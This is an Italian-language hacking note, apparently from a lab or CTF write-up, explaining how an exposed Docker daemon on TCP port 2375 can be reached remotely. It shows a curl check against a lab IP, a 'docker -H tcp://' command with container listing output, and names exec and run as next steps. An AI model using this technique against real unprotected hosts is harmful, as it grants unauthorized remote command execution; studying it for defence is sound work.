tags: docker Docker_Hacking RCE_Esposizione_Demone_Docker


Quando tramite una scansione Nmap ci appare come risultato la porta 2375 aperta come nel seguente esempio:

è possibile eseguire comandi Docker dalla nostra macchina attaccante perchè quel servizio si occupa di convertire e trasferire i comandi Socket UNIX in comandi Socket TCP/IP permettendo di eseguire comandi Docker da remoto.

Per confermare che abbiamo accesso al demone possiamo utlizzare il seguente comando:

curl http://10.10.22.154:2375/version

Per eseguire comandi veri e propri possiamo utilizzare la seguente sintassi:

 
docker -H tcp://10.10.22.154:2375 ps
 
CONTAINER ID   IMAGE                  COMMAND                  CREATED       STATUS             PORTS                    NAMES
63b932f4d7d2   privileged-container   "/usr/sbin/sshd -D"      5 years ago   Up About an hour   0.0.0.0:2244->22/tcp     musing_stonebraker
2b28b54f56f6   namespaces             "/usr/sbin/sshd -D"      5 years ago   Up About an hour   0.0.0.0:2255->22/tcp     goofy_diffie
3d8fe1db6635   container-socket       "/usr/sbin/sshd -D"      5 years ago   Up About an hour   0.0.0.0:2233->22/tcp     brave_mendel
fd1d7cc1b972   registry:2             "/entrypoint.sh /etc…"   5 years ago   Up About an hour   0.0.0.0:5000->5000/tcp   registry_example-registry_1
c5bd077f9ddb   registry:2             "/entrypoint.sh /etc…"   5 years ago   Up About an hour   0.0.0.0:7000->5000/tcp   registry_actual-registry-1_1
 

Altri comandi utili potrebbero essere:

  • network ls

  • images

  • exec

  • run